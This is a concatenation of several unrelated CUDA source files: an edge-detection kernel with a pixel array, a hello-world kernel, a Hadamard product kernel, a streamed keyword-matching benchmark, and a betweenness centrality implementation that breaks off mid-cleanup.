255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,0,0,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255, 255,255,255,255,255,255,255,255,0,255,255,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 }; __global__ void detect_edges(unsigned char *input, unsigned char *output) { int i = (blockIdx.x * 72) + threadIdx.x; int x, y; // the pixel of interest int b, d, f, h; // the pixels adjacent to x,y used for the calculation int r; // the result of calculate y = i / width;; x = i - (width * y); if (x == 0 || y == 0 || x == width - 1 || y == height - 1) { 
output[i] = 0; } else { b = i + width; d = i - 1; f = i + 1; h = i - width; r = (input[i] * 4) + (input[b] * -1) + (input[d] * -1) + (input[f] * -1) + (input[h] * -1); if (r >= 0) { output[i] = 255; } else { output[i] = 0; } } }
21,463
#include<iostream>
using namespace std;

// Each of the launched threads prints its own thread index via the
// device-side printf.
__global__ void print()
{
    printf("hello from gpu thread %d\n", threadIdx.x);
}

int main()
{
    printf("hello from cpu \n");
    print<<<1,10>>>();
    // BUG(fixed): the kernel launch is asynchronous. Without this
    // synchronization the process can exit before the kernel runs, and the
    // device-side printf buffer is never flushed to stdout.
    cudaDeviceSynchronize();
    return 0;
}
21,464
#include "includes.h"

// Element-wise (Hadamard) product: x[i] <- x[i] * wt[i] for i in [0, N).
// One thread per element; threads with an index at or beyond N do nothing,
// so any 1-D launch covering at least N threads is valid.
__global__ void kernel_hadamard_fl(int N, float *wt, float *x)
{
    unsigned int idx = blockDim.x * blockIdx.x + threadIdx.x;

    // Guard against the tail of the last block.
    if (idx < N) {
        x[idx] = x[idx] * wt[idx];
    }
}
21,465
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <ctime>

// Includes CUDA
#include <cuda_runtime.h>

#define LINEWIDTH 20
#define NWORDS 32
#define N_STREAMS 8
#define BLOCK_SIZE 32
#define TITLE_SIZE 1

int length;                        // text length in characters (before padding)
int len;                           // text length in 32-bit words
int nwords;                        // number of keywords (== NWORDS)
int matches[NWORDS];               // CPU reference match counts
char *ctext;                       // raw text, padded with 4 trailing spaces (NOT NUL-terminated)
char keywords[NWORDS][LINEWIDTH];  // 4-character keywords, NUL-terminated at index 4
unsigned int *text;                // word-aliased view of ctext
unsigned int *words;               // keywords packed little-endian, one word each
float cpuRunTime;                  // CPU reference runtime, used for speedup reports

// citation: https://stackoverflow.com/questions/14038589/what-is-the-canonical-way-to-check-for-errors-using-the-cuda-runtime-api
#define checkCudaErrors(ans) { gpuAssert((ans), __FILE__, __LINE__); }
inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true)
{
    if (code != cudaSuccess) {
        fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line);
        if (abort) exit(code);
    }
}

// Read the keyword list and the text file, pad the text to a whole number of
// 32-bit words, and pack each 4-character keyword into one little-endian word.
void intialise(char *input)
{
    nwords = NWORDS;
    printf("-----------\nGoint to read %s\n", input);

    char *line = (char*) malloc(sizeof(char)*LINEWIDTH);
    memset(matches, 0, sizeof(matches));

    // read in text and keywords for processing
    FILE *fp, *wfile;
    wfile = fopen("./data/keywords.txt","r");
    if (!wfile) { printf("keywords.txt: File not found.\n"); exit(0); }

    int k=0, cnt = nwords;
    ssize_t read;                 // getline returns ssize_t (-1 on EOF)
    size_t linelen = LINEWIDTH;
    while((read = getline(&line, &linelen, wfile)) != -1 && cnt--) {
        // Only the first 4 characters of each keyword are significant.
        // BUG(fixed): sizeof(line) was the size of a pointer (8), not the
        // buffer; copy up to the buffer capacity instead.
        strncpy(keywords[k], line, LINEWIDTH - 1);
        keywords[k][4] = '\0';
        k++;
    }
    fclose(wfile);
    free(line);   // getline may have reallocated this buffer; it was leaked before

    fp = fopen(input,"r");
    if (!fp) { printf("Unable to open the file.\n"); exit(0); }
    length = 0;
    while (getc(fp) != EOF) length++;
    // Pad with 4 spaces so the matchers may safely read one word past the end.
    ctext = (char *)malloc(length+4);
    rewind(fp);
    for (int l=0; l<length; l++) ctext[l] = getc(fp);
    for (int l=length; l<length+4; l++) ctext[l] = ' ';
    fclose(fp);
    printf("Length : %d\n", length );

    // define number of words of text, and set pointers
    len = length/4;
    text = (unsigned int *) ctext;

    // define words for matching: pack 4 chars per keyword, little-endian
    words = (unsigned int *)malloc(nwords*sizeof(unsigned int));
    for (int w=0; w<nwords; w++) {
        words[w] = ((unsigned int) keywords[w][0])
                 + ((unsigned int) keywords[w][1])*(1<<8)
                 + ((unsigned int) keywords[w][2])*(1<<16)
                 + ((unsigned int) keywords[w][3])*(1<<24);
    }
}

// Release the buffers allocated by intialise(). `text` aliases `ctext`.
void deinit(){
    free(words);
    free(text);
}

// Compare a GPU result against the CPU reference in `matches`.
void check_matches(int *temp_matches){
    bool isRight = true;
    for(int i = 0; i<NWORDS; i++) {
        if(matches[i] != temp_matches[i]) {
            isRight = false;
            printf("WRONG OUTPUT:\t %s\t|\t%d\n", keywords[i], temp_matches[i]);
        }
    }
    if(isRight) {
        printf(" - Correct Answer -\n");
    }
}

// Pretty-print per-keyword match counts.
void print_matches(int *temp_matches){
    printf("Printing Matches:\n");
    printf("Word\t |\tNumber of Matches\n===================================\n");
    for (int i = 0; i < nwords; ++i)
        printf("%s\t |\t%d\n", keywords[i], temp_matches[i]);
}

// Reference matcher: for every word of text, test all 4 byte offsets
// (stitching in bytes from the next word) against every keyword.
void matchPattern_CPU(unsigned int *text, unsigned int *words, int *matches,
                      int nwords, int length)
{
    unsigned int word;
    for (int l=0; l<length; l++) {
        for (int offset=0; offset<4; offset++) {
            if (offset==0) word = text[l];
            else           word = (text[l]>>(8*offset)) + (text[l+1]<<(32-8*offset));
            for (int w=0; w<nwords; w++){
                matches[w] += (word==words[w]);
            }
        }
    }
}

// CPU execution: fills `matches` and records the wall time used for speedups.
void exec_CPU(){
    const clock_t begin_time = clock();
    matchPattern_CPU(text, words, matches, nwords, len);
    cpuRunTime = (float)( clock() - begin_time ) / CLOCKS_PER_SEC;
    printf("CPU exec time: %f s\n\n", cpuRunTime);
}

// GPU matcher. Launch shape: blockDim.x == NWORDS; each block stages NWORDS
// consecutive text words (+1 halo word) in shared memory, and each thread is
// responsible for exactly one keyword (words[threadIdx.x]). Partial counts
// are accumulated with one atomicAdd per thread into the per-stream slice
// matches[which*NWORDS + tid], so `matches` MUST be zeroed before launch.
__global__ void matchPattern_gpu_1(unsigned int *text, unsigned int *words,
                                   int *matches, int nwords, int length,
                                   int offset_, int which)
{
    int tid = threadIdx.x;
    int idx = offset_ + blockIdx.x * blockDim.x + tid;

    // Stage this block's text words plus one halo word for the shifted reads.
    __shared__ unsigned int text_s[NWORDS + 1];
    text_s[tid] = text[idx];
    text_s[NWORDS] = text[offset_ + (blockIdx.x * blockDim.x) + blockDim.x];

    // Each thread in a block is responsible for one keyword.
    unsigned int keyword = words[tid];
    __syncthreads();

    unsigned int word;
    int sum = 0;
    // BUG(fixed): "#pragma loop unroll" is not a recognized CUDA pragma and
    // was silently ignored; the correct form is "#pragma unroll".
    #pragma unroll
    for(int w = 0; w < NWORDS; w++) {
        #pragma unroll
        for (int offset=0; offset<4; offset++) {
            word = offset==0 ? text_s[w]
                             : (text_s[w]>>(8*offset)) + (text_s[w+1]<<(32-8*offset));
            sum = sum + (word==keyword);
        }
    }
    atomicAdd(&matches[(which*NWORDS)+tid],sum);
}

// citation: https://github.com/NVIDIA-developer-blog/code-samples/blob/master/series/cuda-cpp/overlap-data-transfers/async.cu
// Streamed GPU execution: splits the text across N_STREAMS streams to overlap
// H2D copies, kernels, and D2H copies, then folds the per-stream counts.
void exec_gpu_stream(){
    const int nStreams = N_STREAMS;
    const int streamSize = len / nStreams;
    const int straming_bytes = streamSize * sizeof(unsigned int);

    unsigned int *d_text;
    unsigned int *d_words;
    int *d_matches;
    int *h_matches;

    h_matches = (int *)malloc(nwords*sizeof(int)*N_STREAMS);
    memset(h_matches, 0, nwords*sizeof(int)*N_STREAMS);

    cudaStream_t stream[nStreams];
    for (int i = 0; i < nStreams; i++){
        checkCudaErrors( cudaStreamCreate(&stream[i]));
    }

    // Pin the host buffers so cudaMemcpyAsync can actually run asynchronously.
    // BUG(fixed): `text` was registered with strlen(ctext) although ctext is
    // not NUL-terminated (space-padded), and `h_matches` was registered with
    // only one stream's worth of bytes instead of all N_STREAMS slices.
    cudaHostRegister(words, nwords*sizeof(unsigned int), 0);
    cudaHostRegister(text, len*sizeof(unsigned int), 0);
    cudaHostRegister(h_matches, nwords*sizeof(int)*N_STREAMS, 0);

    checkCudaErrors(cudaMalloc((void**)&d_words, nwords*sizeof(unsigned int)));
    checkCudaErrors(cudaMalloc((void**)&d_matches, nwords*sizeof(int)*nStreams));
    checkCudaErrors(cudaMalloc((void**)&d_text, sizeof(unsigned int)*len));
    // BUG(fixed): the kernel accumulates with atomicAdd, so the counters must
    // start from zero; they previously held uninitialized device memory.
    checkCudaErrors(cudaMemset(d_matches, 0, nwords*sizeof(int)*nStreams));

    cudaEvent_t start, stop;
    float tiime_ = 0;
    checkCudaErrors( cudaEventCreate(&start) );
    checkCudaErrors( cudaEventCreate(&stop) );
    checkCudaErrors( cudaEventRecord(start,0) );

    checkCudaErrors(cudaMemcpy(d_words, words, nwords*sizeof(unsigned int), cudaMemcpyHostToDevice));

    for (int i = 0; i < nStreams; ++i) {
        int offset = i * streamSize;
        checkCudaErrors(cudaMemcpyAsync(&d_text[offset], &text[offset], straming_bytes,
                                        cudaMemcpyHostToDevice, stream[i]));
    }
    for (int i = 0; i < nStreams; ++i) {
        int offset = i * streamSize;
        // NOTE(review): streamSize/NWORDS truncates before ceil() sees it, so
        // up to NWORDS-1 tail words per stream are never scanned. Kept as-is
        // because the kernel stages shared memory without bounds checks and
        // rounding up would read past the padded text — confirm intent.
        matchPattern_gpu_1<<<ceil(streamSize/(TITLE_SIZE*NWORDS)), NWORDS, 0, stream[i]>>>
            (d_text, d_words, d_matches, nwords, len, offset, i);
    }
    for (int i = 0; i < nStreams; ++i) {
        checkCudaErrors(cudaMemcpyAsync(&h_matches[(i*NWORDS)], &d_matches[(i*NWORDS)],
                                        NWORDS*sizeof(int), cudaMemcpyDeviceToHost, stream[i]));
    }

    // The legacy default stream synchronizes with all other streams, so this
    // stop event is recorded only after every async copy above has finished.
    checkCudaErrors( cudaEventRecord(stop, 0) );
    checkCudaErrors( cudaEventSynchronize(stop) );
    checkCudaErrors( cudaEventElapsedTime(&tiime_, start, stop) );
    printf("Time kernel+memory: %fs\n", tiime_/1000);
    printf("Speedup with memory: %f\n", cpuRunTime/((tiime_)/1000));

    // Fold the per-stream partial counts into the first NWORDS slots.
    for(int w=0; w < NWORDS; w++) {
        for (int i = 1; i < nStreams; ++i) {
            h_matches[w] += h_matches[(i*NWORDS) + w];
        }
    }
    check_matches(h_matches);

    // cleanup
    checkCudaErrors( cudaEventDestroy(start) );
    checkCudaErrors( cudaEventDestroy(stop) );
    for (int i = 0; i < nStreams; ++i) {
        checkCudaErrors( cudaStreamDestroy(stream[i]));
    }
    cudaHostUnregister(text);
    cudaHostUnregister(words);
    cudaHostUnregister(h_matches);
    free(h_matches);   // was leaked before
    cudaFree(d_words);
    cudaFree(d_matches);
    cudaFree(d_text);
}

// Single-stream GPU execution with separate H2D / kernel / D2H timings.
void exec_gpu_simple(){
    unsigned int *d_text;
    unsigned int *d_words;
    int *d_matches;
    int *h_matches;

    h_matches = (int *)malloc(nwords*sizeof(int));

    checkCudaErrors(cudaMalloc((void**)&d_words, nwords*sizeof(unsigned int)));
    checkCudaErrors(cudaMalloc((void**)&d_matches, nwords*sizeof(int)));
    checkCudaErrors(cudaMalloc((void**)&d_text, sizeof(unsigned int)*len));
    // BUG(fixed): the kernel atomicAdds into d_matches, so it must be zeroed
    // first; it previously accumulated onto uninitialized device memory.
    checkCudaErrors(cudaMemset(d_matches, 0, nwords*sizeof(int)));

    cudaEvent_t start,stop;
    float time_H2D,time_D2H,time_kernel;
    checkCudaErrors(cudaEventCreate(&start));
    checkCudaErrors(cudaEventCreate(&stop));

    // MEMCOPY
    cudaEventRecord(start, 0);
    checkCudaErrors(cudaMemcpy(d_words, words, nwords*sizeof(unsigned int), cudaMemcpyHostToDevice));
    checkCudaErrors(cudaMemcpy(d_text, text, sizeof(unsigned int)*len, cudaMemcpyHostToDevice));
    cudaEventRecord(stop,0);
    cudaEventSynchronize(stop);
    cudaEventElapsedTime(&time_H2D,start,stop);
    printf("HostToDevice memcopy time: %fs\n", time_H2D/1000);

    // RUN KERNEL
    cudaEventRecord(start, 0);
    matchPattern_gpu_1<<< ceil((float)len/(TITLE_SIZE*NWORDS)),NWORDS>>>(d_text, d_words, d_matches, nwords, len, 0, 0);
    cudaEventRecord(stop,0);
    cudaEventSynchronize(stop);
    checkCudaErrors(cudaPeekAtLastError());
    cudaEventElapsedTime(&time_kernel,start,stop);
    printf("Kernel execution time: %fs\n", time_kernel/1000);

    cudaEventRecord(start, 0);
    checkCudaErrors(cudaMemcpy(h_matches, d_matches, nwords*sizeof(int), cudaMemcpyDeviceToHost));
    cudaEventRecord(stop,0);
    cudaEventSynchronize(stop);
    cudaEventElapsedTime(&time_D2H,start,stop);
    printf("DeviceToHost memcopy time: %fs\n", time_D2H/1000);
    printf("Total memcopy time: %fs\n", (time_D2H+time_H2D)/1000);
    printf("Total memcopy+kernel time: %fs\n", (time_D2H+time_H2D+time_kernel)/1000);
    printf("Speedup without memory: %f\n", cpuRunTime/((time_kernel)/1000));
    printf("Speedup with memory: %f\n", cpuRunTime/((time_D2H + time_H2D + time_kernel)/1000));
    check_matches(h_matches);

    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    free(h_matches);
    cudaFree(d_words);
    cudaFree(d_matches);
    cudaFree(d_text);
}

int main(int argc, const char **argv)
{
    // BUG(fixed): intialise() was called three times but deinit() only once,
    // leaking the previous text/keyword buffers on each subsequent run.
    intialise("./data/small.txt");
    exec_CPU();
    exec_gpu_stream();
    deinit();

    intialise("./data/medium.txt");
    exec_CPU();
    exec_gpu_stream();
    deinit();

    intialise("./data/large.txt");
    exec_CPU();
    exec_gpu_stream();
    deinit();
}
21,466
/* Authors - Dibyadarshan Hota 16CO154 - Omkar Prabhu 16CO233 */
#include <iostream>
#include <stdio.h>
#include <sstream>
#include <string.h>
#include <climits>   // INT_MAX (previously pulled in transitively)
#include <cuda.h>

#define ll long long

using namespace std;

/**
 * Kernel for computing Betweenness Centrality (Brandes' algorithm).
 *
 * Launched as a SINGLE block: each iteration of the outer loop handles one
 * source vertex s with a level-synchronous BFS, then the reverse dependency
 * accumulation. Result is accumulated into global-memory array bc.
 *
 * nodes         : number of vertices
 * C, R          : CSR adjacency (column indices / row offsets)
 * d             : per-vertex BFS depth from the current source
 * sigma         : number of shortest paths from the current source
 * delta         : dependency accumulator
 * bc            : output, betweenness centrality per vertex
 * reverse_stack : vertices recorded in BFS visitation order
 * finish_limit  : offsets into reverse_stack, one per BFS level
 */
__global__ void betweenness_centrality_kernel (int nodes, int *C, int *R, int *d, int *sigma, float *delta, float *bc, int *reverse_stack, int *finish_limit)
{
    // Shared bookkeeping: next free slot in reverse_stack, current source,
    // and number of recorded BFS levels.
    __shared__ int position;
    __shared__ int s;
    __shared__ int finish_limit_position;

    int idx = threadIdx.x;
    if (idx == 0) {
        s = 0;
    }
    __syncthreads();

    // Iterate over every source vertex.
    while (s < nodes) {
        __syncthreads();

        // Initialise d, sigma and delta for this source.
        for (int v = idx; v < nodes; v += blockDim.x) {
            if (v == s) {
                d[v] = 0;
                sigma[v] = 1;
            } else {
                d[v] = INT_MAX;
                sigma[v] = 0;
            }
            delta[v] = 0;
        }
        __syncthreads();

        __shared__ int current_depth;
        __shared__ bool done;
        if (idx == 0) {
            done = false;
            current_depth = 0;
            position = 0;
            finish_limit_position = 1;
            finish_limit[0] = 0;
        }
        __syncthreads();

        // Level-synchronous BFS (vertex-parallel): one depth per pass.
        while (!done) {
            __syncthreads();
            done = true;          // benign race: every thread writes the same value
            __syncthreads();

            for (int v = idx; v < nodes; v += blockDim.x) {
                if (d[v] == current_depth) {
                    // Record v in visitation order.
                    int t = atomicAdd(&position, 1);
                    reverse_stack[t] = v;
                    // Relax all neighbours of v.
                    for (int r = R[v]; r < R[v+1]; r++) {
                        int w = C[r];
                        // Not visited yet: extend the frontier.
                        if (d[w] == INT_MAX) {
                            d[w] = d[v] + 1;
                            done = false;
                        }
                        // w lies one level below v: add v's path count.
                        if (d[w] == (d[v] + 1)) {
                            atomicAdd(&sigma[w], sigma[v]);
                        }
                    }
                }
            }
            __syncthreads();

            if (idx == 0) {
                current_depth++;
                finish_limit[finish_limit_position] = position;
                ++finish_limit_position;
            }
        }

        // Drop the final (empty) level and the trailing sentinel entry.
        if (idx == 0) {
            finish_limit_position -= 2;
        }
        __syncthreads();

        // Reverse dependency accumulation, level by level (vertex-parallel).
        for (int itr1 = finish_limit_position; itr1 >= 0; --itr1) {
            for (int itr2 = finish_limit[itr1] + idx; itr2 < finish_limit[itr1+1]; itr2 += blockDim.x) {
                // reverse_stack[itr2] is one vertex of this level.
                for (int itr3 = R[reverse_stack[itr2]]; itr3 < R[reverse_stack[itr2] + 1]; ++itr3) {
                    int consider = C[itr3];   // neighbour one level deeper
                    if (d[consider] == d[reverse_stack[itr2]] + 1) {
                        delta[reverse_stack[itr2]] += (((float)sigma[reverse_stack[itr2]] / sigma[consider]) * ((float)1 + delta[consider]));
                    }
                }
                if (reverse_stack[itr2] != s) {
                    bc[reverse_stack[itr2]] += delta[reverse_stack[itr2]];
                }
            }
            __syncthreads();
        }

        // Advance to the next source vertex.
        __syncthreads();
        if (idx == 0) {
            s += 1;
        }
    }
}

/**
 * Reads a graph from stdin (first line "<nodes> <edges>", then one
 * adjacency line per vertex), builds the CSR arrays, runs the BC kernel
 * and reports the kernel time and the maximum betweenness value.
 */
int main ()
{
    // ================== READ INPUT, BUILD COMPRESSED ADJACENCY LIST ==================
    int nodes, edges;
    cin >> nodes >> edges;

    // V = row offsets (nodes+1 entries), E = column indices (2*edges entries).
    int * V = new int[nodes + 1];
    int * E = new int[2 * edges];

    string line;
    int node = 0;
    int counter = 0;
    getline(cin, line);               // consume the remainder of the first line
    for (int i = 0; i < nodes; ++i) {
        getline(cin, line);
        V[node] = counter;
        istringstream is(line);
        int tmp;
        while (is >> tmp) {
            E[counter] = tmp;
            counter += 1;
        }
        ++node;
    }
    V[node] = counter;

    // ================== DECLARE AND INIT VARIABLES ==================
    int *d = new int[nodes];
    int *sigma = new int[nodes];
    float *delta = new float[nodes];
    float *bc = new float[nodes];
    // BUG FIX: the original used memset(bc, 0, sizeof(bc)); sizeof(bc) is
    // the size of a pointer, so only 8 bytes were cleared and most of the
    // array was copied to the device uninitialised.
    memset(bc, 0, sizeof(float) * nodes);

    int *d_d, *d_sigma, *d_V, *d_E, *d_reverse_stack, *d_end_point;
    float *d_delta, *d_bc;
    cudaMalloc((void**)&d_d, sizeof(int) * nodes);
    cudaMalloc((void**)&d_end_point, sizeof(int) * (nodes + 1));
    cudaMalloc((void**)&d_sigma, sizeof(int) * nodes);
    cudaMalloc((void**)&d_reverse_stack, sizeof(int) * nodes);
    cudaMalloc((void**)&d_V, sizeof(int) * (nodes + 1));
    cudaMalloc((void**)&d_E, sizeof(int) * (2*edges));
    cudaMalloc((void**)&d_delta, sizeof(float) * nodes);
    cudaMalloc((void**)&d_bc, sizeof(float) * nodes);

    cudaMemcpy(d_V, V, sizeof(int) * (nodes+1), cudaMemcpyHostToDevice);
    cudaMemcpy(d_E, E, sizeof(int) * (2*edges), cudaMemcpyHostToDevice);
    cudaMemcpy(d_bc, bc, sizeof(float) * (nodes), cudaMemcpyHostToDevice);

    // ================== KERNEL PARAMS AND CALL ==================
    float elapsed_time;
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start, 0);

    // Single block, 1024 threads (the kernel's outer loop serialises sources).
    betweenness_centrality_kernel <<<1, 1024>>> (nodes, d_E, d_V, d_d, d_sigma, d_delta, d_bc, d_reverse_stack, d_end_point);

    cudaEventRecord(stop, 0);
    cudaEventSynchronize(stop);
    cudaEventElapsedTime(&elapsed_time, start, stop);

    // ================== RESULT ==================
    cudaMemcpy(bc, d_bc, sizeof(float) * nodes, cudaMemcpyDeviceToHost);

    cout<<"Result: \n";
    cout<<"\n";
    cout<<"Execution time: "<<elapsed_time/1000.0<<endl;

    // Maximum BC value (each undirected edge counted twice, hence /2).
    float max_bc = 0.0;
    for (int i = 0; i < nodes; ++i) {
        max_bc = (bc[i] > max_bc) ? bc[i] : max_bc;
    }
    cout<<"Max BC value: "<<max_bc/2.0<<endl;

    // ================== MEMORY RELEASE ==================
    cudaFree(d_sigma);
    cudaFree(d_d);
    cudaFree(d_V);
    cudaFree(d_E);
    cudaFree(d_delta);
